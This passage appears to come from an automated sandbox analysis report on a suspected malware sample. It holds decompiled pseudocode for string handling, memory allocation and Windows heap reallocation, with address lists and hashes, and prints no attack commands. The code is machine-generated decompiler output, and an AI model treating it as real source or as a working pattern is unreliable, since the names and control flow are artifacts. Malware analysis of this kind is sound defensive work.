                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                            					_t14 = _v8;
                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                            					if(_t15 == 0) {
                                                                            						_t17 = _t27;
                                                                            					} else {
                                                                            						_t27 = CharNextA(_t27);
                                                                            						continue;
                                                                            					}
                                                                            					L5:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = 0;
                                                                            				goto L5;
                                                                            			}










                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                            • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:0%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:118
                                                                            Total number of Limit Nodes:1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1671468-16714a3 NtAllocateVirtualMemory 1 1671435 0->1 2 16714a5-16714e0 0->2
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL ref: 01671473
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210648935807.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1660000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 6bd6cfe0b5221bbead50ebec75a970b6ff2369096bf27c30b12300d2a59c3abb
                                                                            • Instruction ID: 21e5c73aedc0fb555a0a46ff90d9b6b3b18c2ab30ff98a81fe657a8dfd541e52
                                                                            • Opcode Fuzzy Hash: 6bd6cfe0b5221bbead50ebec75a970b6ff2369096bf27c30b12300d2a59c3abb
                                                                            • Instruction Fuzzy Hash: FC019963A05B5A8FC313DE2CDC82A4EBEB2EA51950354077F8031DB7C6E352810B8292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 9 1d812d10-1d812d1c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                            • Instruction ID: e3ecd6c5dd03bf93acf82fd5af41466341e51f6459f4413ae697a6afcf1f70df
                                                                            • Opcode Fuzzy Hash: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                            • Instruction Fuzzy Hash: 3990023125100413D9116159460470B001947D0241FD2C816F0414518DD66E8996F123
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 8 1d812b90-1d812b9c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                            • Instruction ID: ad50fc3984c5715075e51c1d2eae1cfdb236cbe1bc178b3a03e7dbf4bf3e8b2a
                                                                            • Opcode Fuzzy Hash: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                            • Instruction Fuzzy Hash: 7A90023125108802D9106159850474E001547D0301FD6C815F4414618DC6AD88D5B123
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 7 1d812b10-1d812b1c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                            • Instruction ID: 6addd082275779705d02bc8246a5a0b8ba18d0a8a04c4f7e49f2c2fa49234fb9
                                                                            • Opcode Fuzzy Hash: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                            • Instruction Fuzzy Hash: 0B90023125100802D9807159450474E001547D1301FD2C419F0015614DCA2D8A9DB7A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3 1d812b2a-1d812b2f 4 1d812b31-1d812b38 3->4 5 1d812b3f-1d812b46 LdrInitializeThunk 3->5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                            • Instruction ID: a84da4ab08504ae2621b8c900b060832708781215b6c17256189d4500c209bba
                                                                            • Opcode Fuzzy Hash: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                            • Instruction Fuzzy Hash: 49B09B719414C5CEDA01D760470871B791067D0701F57C455F1460641E473CC0D5F277
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            C-Code - Quality: 64%
                                                                            			E1D87FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed int _t130;
                                                                            				signed int _t132;
                                                                            				intOrPtr _t138;
                                                                            				intOrPtr _t139;
                                                                            				signed int _t149;
                                                                            				signed int _t150;
                                                                            				intOrPtr _t151;
                                                                            				signed int _t152;
                                                                            				intOrPtr _t155;
                                                                            				intOrPtr _t159;
                                                                            				intOrPtr _t172;
                                                                            				signed int _t173;
                                                                            				signed int _t174;
                                                                            				signed char _t177;
                                                                            				signed int _t178;
                                                                            				signed int _t183;
                                                                            				void* _t184;
                                                                            				signed char _t192;
                                                                            				signed int _t193;
                                                                            				intOrPtr _t195;
                                                                            				intOrPtr _t199;
                                                                            				signed int _t209;
                                                                            				signed int _t226;
                                                                            				signed char _t236;
                                                                            				intOrPtr _t240;
                                                                            				signed int* _t248;
                                                                            				signed int _t253;
                                                                            				signed int _t255;
                                                                            				signed int _t267;
                                                                            				signed int _t278;
                                                                            				signed int* _t279;
                                                                            				intOrPtr* _t283;
                                                                            				void* _t284;
                                                                            				void* _t286;
                                                                            
                                                                            				_push(0x40);
                                                                            				_push(0x1d8ad430);
                                                                            				E1D827BE4(__ebx, __edi, __esi);
                                                                            				_t281 = __ecx;
                                                                            				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
                                                                            				 *((char*)(_t284 - 0x19)) = 0;
                                                                            				 *(_t284 - 0x24) = 0;
                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                            					 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                            					 *((intOrPtr*)(_t284 - 4)) = 1;
                                                                            					_t130 = E1D7C7662("RtlReAllocateHeap");
                                                                            					__eflags = _t130;
                                                                            					if(_t130 == 0) {
                                                                            						L72:
                                                                            						 *(_t284 - 0x24) = 0;
                                                                            						L73:
                                                                            						 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                            						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
                                                                            						E1D8802E6(_t281);
                                                                            						_t132 =  *(_t284 - 0x24);
                                                                            						goto L75;
                                                                            					}
                                                                            					_t236 =  *(__ecx + 0x44) | __edx;
                                                                            					 *(_t284 - 0x30) = _t236;
                                                                            					 *(_t284 - 0x34) = _t236 | 0x10000100;
                                                                            					__eflags =  *(_t284 + 0xc);
                                                                            					if( *(_t284 + 0xc) == 0) {
                                                                            						_t267 = 1;
                                                                            						__eflags = 1;
                                                                            					} else {
                                                                            						_t267 =  *(_t284 + 0xc);
                                                                            					}
                                                                            					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
                                                                            					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
                                                                            					__eflags = _t138 -  *(_t284 + 0xc);
                                                                            					if(_t138 <  *(_t284 + 0xc)) {
                                                                            						L68:
                                                                            						_t139 =  *[fs:0x30];
                                                                            						__eflags =  *(_t139 + 0xc);
                                                                            						if( *(_t139 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push( *((intOrPtr*)(_t281 + 0x78)));
                                                                            						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
                                                                            						goto L72;
                                                                            					}
                                                                            					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
                                                                            					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
                                                                            						goto L68;
                                                                            					}
                                                                            					 *(_t284 - 0x20) = 0;
                                                                            					__eflags = _t236 & 0x00000001;
                                                                            					if((_t236 & 0x00000001) == 0) {
                                                                            						E1D7DFED0( *((intOrPtr*)(_t281 + 0xc8)));
                                                                            						 *((char*)(_t284 - 0x19)) = 1;
                                                                            						_t226 =  *(_t284 - 0x30) | 0x10000101;
                                                                            						__eflags = _t226;
                                                                            						 *(_t284 - 0x34) = _t226;
                                                                            					}
                                                                            					E1D880835(_t281, 0);
                                                                            					_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                            					_t269 = _t277 - 8;
                                                                            					__eflags =  *((char*)(_t269 + 7)) - 5;
                                                                            					if( *((char*)(_t269 + 7)) == 5) {
                                                                            						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
                                                                            						__eflags = _t269;
                                                                            					}
                                                                            					 *(_t284 - 0x2c) = _t269;
                                                                            					 *(_t284 - 0x28) = _t269;
                                                                            					_t240 = _t281;
                                                                            					_t149 = E1D7C753F(_t240, _t269, "RtlReAllocateHeap");
                                                                            					__eflags = _t149;
                                                                            					if(_t149 == 0) {
                                                                            						L53:
                                                                            						_t150 =  *(_t284 - 0x24);
                                                                            						__eflags = _t150;
                                                                            						if(_t150 == 0) {
                                                                            							goto L73;
                                                                            						}
                                                                            						__eflags = _t150 -  *0x1d8c47c8; // 0x0
                                                                            						_t151 =  *[fs:0x30];
                                                                            						if(__eflags != 0) {
                                                                            							_t152 =  *(_t151 + 0x68);
                                                                            							 *(_t284 - 0x48) = _t152;
                                                                            							__eflags = _t152 & 0x00000800;
                                                                            							if((_t152 & 0x00000800) == 0) {
                                                                            								goto L73;
                                                                            							}
                                                                            							__eflags =  *(_t284 - 0x20) -  *0x1d8c47cc; // 0x0
                                                                            							if(__eflags != 0) {
                                                                            								goto L73;
                                                                            							}
                                                                            							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
                                                                            							if(__eflags != 0) {
                                                                            								goto L73;
                                                                            							}
                                                                            							_t155 =  *[fs:0x30];
                                                                            							__eflags =  *(_t155 + 0xc);
                                                                            							if( *(_t155 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E1D7CB910();
                                                                            							} else {
                                                                            								E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push(E1D87823A(_t281,  *(_t284 - 0x20)));
                                                                            							_push( *(_t284 + 0xc));
                                                                            							E1D7CB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
                                                                            							L59:
                                                                            							_t159 =  *[fs:0x30];
                                                                            							__eflags =  *((char*)(_t159 + 2));
                                                                            							if( *((char*)(_t159 + 2)) != 0) {
                                                                            								 *0x1d8c47a1 = 1;
                                                                            								 *0x1d8c4100 = 0;
                                                                            								asm("int3");
                                                                            								 *0x1d8c47a1 = 0;
                                                                            							}
                                                                            							goto L73;
                                                                            						}
                                                                            						__eflags =  *(_t151 + 0xc);
                                                                            						if( *(_t151 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push( *(_t284 + 0xc));
                                                                            						E1D7CB910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8c47c8);
                                                                            						goto L59;
                                                                            					} else {
                                                                            						__eflags = _t277 -  *0x1d8c47c8; // 0x0
                                                                            						_t172 =  *[fs:0x30];
                                                                            						if(__eflags != 0) {
                                                                            							_t173 =  *(_t172 + 0x68);
                                                                            							 *(_t284 - 0x44) = _t173;
                                                                            							__eflags = _t173 & 0x00000800;
                                                                            							if((_t173 & 0x00000800) == 0) {
                                                                            								L38:
                                                                            								_t174 = E1D7E2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
                                                                            								 *(_t284 - 0x24) = _t174;
                                                                            								__eflags = _t174;
                                                                            								if(_t174 != 0) {
                                                                            									_t75 = _t174 - 8; // -8
                                                                            									_t278 = _t75;
                                                                            									__eflags =  *((char*)(_t278 + 7)) - 5;
                                                                            									if( *((char*)(_t278 + 7)) == 5) {
                                                                            										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
                                                                            										__eflags = _t278;
                                                                            									}
                                                                            									_t248 = _t278;
                                                                            									 *(_t284 - 0x28) = _t278;
                                                                            									__eflags =  *(_t281 + 0x4c);
                                                                            									if( *(_t281 + 0x4c) != 0) {
                                                                            										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                            										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
                                                                            										if(__eflags != 0) {
                                                                            											_push(_t248);
                                                                            											_t269 = _t278;
                                                                            											E1D88D646(0, _t281, _t278, _t278, _t281, __eflags);
                                                                            										}
                                                                            									}
                                                                            									__eflags =  *(_t278 + 2) & 0x00000002;
                                                                            									if(( *(_t278 + 2) & 0x00000002) == 0) {
                                                                            										_t177 =  *(_t278 + 3);
                                                                            										 *(_t284 - 0x1b) = _t177;
                                                                            										_t178 = _t177 & 0x000000ff;
                                                                            									} else {
                                                                            										_t183 = E1D803AE9(_t278);
                                                                            										 *(_t284 - 0x30) = _t183;
                                                                            										__eflags =  *(_t281 + 0x40) & 0x08000000;
                                                                            										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
                                                                            											 *_t183 = 0;
                                                                            										} else {
                                                                            											_t184 = E1D7FFDB9(1, _t269);
                                                                            											_t253 =  *(_t284 - 0x30);
                                                                            											 *_t253 = _t184;
                                                                            											_t183 = _t253;
                                                                            										}
                                                                            										_t178 =  *((intOrPtr*)(_t183 + 2));
                                                                            									}
                                                                            									 *(_t284 - 0x20) = _t178;
                                                                            									__eflags =  *(_t281 + 0x4c);
                                                                            									if( *(_t281 + 0x4c) != 0) {
                                                                            										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
                                                                            										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                            										__eflags =  *_t278;
                                                                            									}
                                                                            								}
                                                                            								E1D880D24(_t281);
                                                                            								__eflags = 0;
                                                                            								E1D880835(_t281, 0);
                                                                            								goto L53;
                                                                            							}
                                                                            							__eflags =  *0x1d8c47cc;
                                                                            							if( *0x1d8c47cc == 0) {
                                                                            								goto L38;
                                                                            							}
                                                                            							_t279 =  *(_t284 - 0x28);
                                                                            							_t269 =  *(_t284 - 0x2c);
                                                                            							__eflags =  *(_t281 + 0x4c);
                                                                            							if( *(_t281 + 0x4c) != 0) {
                                                                            								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                            								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
                                                                            								if(__eflags != 0) {
                                                                            									_push(_t240);
                                                                            									E1D88D646(0, _t281, _t279, _t279, _t281, __eflags);
                                                                            									_t269 =  *(_t284 - 0x2c);
                                                                            								}
                                                                            							}
                                                                            							__eflags = _t279[0] & 0x00000002;
                                                                            							if((_t279[0] & 0x00000002) == 0) {
                                                                            								_t192 = _t279[0];
                                                                            								 *(_t284 - 0x1a) = _t192;
                                                                            								_t193 = _t192 & 0x000000ff;
                                                                            							} else {
                                                                            								_t209 = E1D803AE9(_t279);
                                                                            								 *(_t284 - 0x30) = _t209;
                                                                            								_t193 =  *(_t209 + 2) & 0x0000ffff;
                                                                            							}
                                                                            							_t255 = _t193;
                                                                            							 *(_t284 - 0x20) = _t193;
                                                                            							__eflags =  *(_t281 + 0x4c);
                                                                            							if( *(_t281 + 0x4c) != 0) {
                                                                            								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
                                                                            								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                            								__eflags =  *_t279;
                                                                            							}
                                                                            							__eflags = _t255;
                                                                            							if(_t255 == 0) {
                                                                            								L37:
                                                                            								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                            							} else {
                                                                            								__eflags = _t255 -  *0x1d8c47cc; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L37;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L37;
                                                                            								}
                                                                            								_t195 =  *[fs:0x30];
                                                                            								__eflags =  *(_t195 + 0xc);
                                                                            								if( *(_t195 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E1D7CB910();
                                                                            								} else {
                                                                            									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_t269 =  *(_t284 - 0x20);
                                                                            								_push(E1D87823A(_t281,  *(_t284 - 0x20)));
                                                                            								_push( *(_t284 + 0xc));
                                                                            								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                            								E1D7CB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
                                                                            								_t286 = _t286 + 0x10;
                                                                            								L18:
                                                                            								_t199 =  *[fs:0x30];
                                                                            								__eflags =  *((char*)(_t199 + 2));
                                                                            								if( *((char*)(_t199 + 2)) != 0) {
                                                                            									 *0x1d8c47a1 = 1;
                                                                            									 *0x1d8c4100 = 0;
                                                                            									asm("int3");
                                                                            									 *0x1d8c47a1 = 0;
                                                                            								}
                                                                            							}
                                                                            							goto L38;
                                                                            						}
                                                                            						__eflags =  *(_t172 + 0xc);
                                                                            						if( *(_t172 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push( *(_t284 + 0xc));
                                                                            						E1D7CB910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8c47c8);
                                                                            						_t286 = _t286 + 0xc;
                                                                            						goto L18;
                                                                            					}
                                                                            				} else {
                                                                            					_t283 =  *0x1d8c374c; // 0x0
                                                                            					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
                                                                            					_t132 =  *_t283();
                                                                            					L75:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
                                                                            					return _t132;
                                                                            				}
                                                                            			}





































                                                                            0x1d87fedf
                                                                            0x1d87fee7
                                                                            0x1d87fee9
                                                                            0x1d87feee
                                                                            0x1d87fef0
                                                                            0x1d880122
                                                                            0x1d880122
                                                                            0x1d880125
                                                                            0x1d880127
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d88012d
                                                                            0x1d880133
                                                                            0x1d880139
                                                                            0x1d8801a7
                                                                            0x1d8801aa
                                                                            0x1d8801ad
                                                                            0x1d8801b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801bc
                                                                            0x1d8801c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801cd
                                                                            0x1d8801d4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801da
                                                                            0x1d8801e0
                                                                            0x1d8801e3
                                                                            0x1d880202
                                                                            0x1d880207
                                                                            0x1d8801e5
                                                                            0x1d8801fa
                                                                            0x1d8801ff
                                                                            0x1d880218
                                                                            0x1d880219
                                                                            0x1d880224
                                                                            0x1d88017e
                                                                            0x1d88017e
                                                                            0x1d880184
                                                                            0x1d880188
                                                                            0x1d88018e
                                                                            0x1d880195
                                                                            0x1d88019b
                                                                            0x1d88019c
                                                                            0x1d88019c
                                                                            0x00000000
                                                                            0x1d880188
                                                                            0x1d88013b
                                                                            0x1d88013e
                                                                            0x1d88015d
                                                                            0x1d880162
                                                                            0x1d880140
                                                                            0x1d880155
                                                                            0x1d88015a
                                                                            0x1d880168
                                                                            0x1d880176
                                                                            0x00000000
                                                                            0x1d87fef6
                                                                            0x1d87fef6
                                                                            0x1d87fefc
                                                                            0x1d87ff02
                                                                            0x1d87ff70
                                                                            0x1d87ff73
                                                                            0x1d87ff76
                                                                            0x1d87ff7b
                                                                            0x1d880068
                                                                            0x1d880070
                                                                            0x1d880075
                                                                            0x1d880078
                                                                            0x1d88007a
                                                                            0x1d880080
                                                                            0x1d880080
                                                                            0x1d880083
                                                                            0x1d880087
                                                                            0x1d880090
                                                                            0x1d880090
                                                                            0x1d880090
                                                                            0x1d880092
                                                                            0x1d880094
                                                                            0x1d880097
                                                                            0x1d88009a
                                                                            0x1d88009f
                                                                            0x1d8800a9
                                                                            0x1d8800ac
                                                                            0x1d8800ae
                                                                            0x1d8800af
                                                                            0x1d8800b3
                                                                            0x1d8800b3
                                                                            0x1d8800ac
                                                                            0x1d8800b8
                                                                            0x1d8800bc
                                                                            0x1d8800ec
                                                                            0x1d8800ef
                                                                            0x1d8800f2
                                                                            0x1d8800be
                                                                            0x1d8800c0
                                                                            0x1d8800c5
                                                                            0x1d8800ca
                                                                            0x1d8800d1
                                                                            0x1d8800e3
                                                                            0x1d8800d3
                                                                            0x1d8800d4
                                                                            0x1d8800d9
                                                                            0x1d8800dc
                                                                            0x1d8800df
                                                                            0x1d8800df
                                                                            0x1d8800e6
                                                                            0x1d8800e6
                                                                            0x1d8800f5
                                                                            0x1d8800f9
                                                                            0x1d8800fc
                                                                            0x1d880108
                                                                            0x1d88010e
                                                                            0x1d88010e
                                                                            0x1d88010e
                                                                            0x1d8800fc
                                                                            0x1d880114
                                                                            0x1d880119
                                                                            0x1d88011d
                                                                            0x00000000
                                                                            0x1d88011d
                                                                            0x1d87ff81
                                                                            0x1d87ff88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87ff8e
                                                                            0x1d87ff91
                                                                            0x1d87ff94
                                                                            0x1d87ff97
                                                                            0x1d87ff9c
                                                                            0x1d87ffa6
                                                                            0x1d87ffa9
                                                                            0x1d87ffab
                                                                            0x1d87ffb0
                                                                            0x1d87ffb5
                                                                            0x1d87ffb5
                                                                            0x1d87ffa9
                                                                            0x1d87ffb8
                                                                            0x1d87ffbc
                                                                            0x1d87ffce
                                                                            0x1d87ffd1
                                                                            0x1d87ffd4
                                                                            0x1d87ffbe
                                                                            0x1d87ffc0
                                                                            0x1d87ffc5
                                                                            0x1d87ffc8
                                                                            0x1d87ffc8
                                                                            0x1d87ffd7
                                                                            0x1d87ffd9
                                                                            0x1d87ffdd
                                                                            0x1d87ffe0
                                                                            0x1d87ffea
                                                                            0x1d87fff0
                                                                            0x1d87fff0
                                                                            0x1d87fff0
                                                                            0x1d87fff2
                                                                            0x1d87fff5
                                                                            0x1d880065
                                                                            0x1d880065
                                                                            0x1d87fff7
                                                                            0x1d87fff7
                                                                            0x1d87fffe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d880004
                                                                            0x1d88000b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d88000d
                                                                            0x1d880013
                                                                            0x1d880016
                                                                            0x1d880035
                                                                            0x1d88003a
                                                                            0x1d880018
                                                                            0x1d88002d
                                                                            0x1d880032
                                                                            0x1d880040
                                                                            0x1d88004b
                                                                            0x1d88004c
                                                                            0x1d88004f
                                                                            0x1d880058
                                                                            0x1d88005d
                                                                            0x1d87ff47
                                                                            0x1d87ff47
                                                                            0x1d87ff4d
                                                                            0x1d87ff51
                                                                            0x1d87ff57
                                                                            0x1d87ff5e
                                                                            0x1d87ff64
                                                                            0x1d87ff65
                                                                            0x1d87ff65
                                                                            0x1d87ff51
                                                                            0x00000000
                                                                            0x1d87fff5
                                                                            0x1d87ff04
                                                                            0x1d87ff07
                                                                            0x1d87ff26
                                                                            0x1d87ff2b
                                                                            0x1d87ff09
                                                                            0x1d87ff1e
                                                                            0x1d87ff23
                                                                            0x1d87ff31
                                                                            0x1d87ff3f
                                                                            0x1d87ff44
                                                                            0x00000000
                                                                            0x1d87ff44
                                                                            0x1d87fe18
                                                                            0x1d87fe20
